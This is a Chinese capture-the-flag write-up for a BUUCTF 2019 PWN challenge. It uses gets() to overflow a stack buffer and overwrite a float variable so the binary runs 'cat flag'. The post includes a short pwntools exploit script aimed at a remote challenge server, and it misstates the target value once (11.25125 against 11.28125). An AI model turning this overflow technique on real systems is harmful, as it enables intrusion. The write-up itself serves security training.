标签：0x41348000 BUUCTF 函数 v2 拿到 flag 2019 PWN payload

 

拿到文件先checksec

 

仅开启了NX保护

放入IDA中

查看main函数很简单，没有什么明显漏洞

 

发现了func函数，双击试试看

 

可以看到只要v2等于11.25125就可以执行cat flag命令

先把11.28125转为16进制，放着备用（0x41348000）

我们的思路就是利用gets这个危险函数，通过覆盖v1的地址来修改v2的值，进而执行system命令，拿到flag。

 

写脚本

from pwn import *

p=remote('node4.buuoj.cn',25989)

payload='a'*0x2c+p64(0x41348000)

p.recvuntil("Let's guess the number.")

p.sendline(payload)

p.interactive()

 

运行试试

拿到flag！

 

标签：0x41348000,BUUCTF,函数,v2,拿到,flag,2019,PWN,payload
来源： https://blog.csdn.net/m0_54262894/article/details/120231533

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。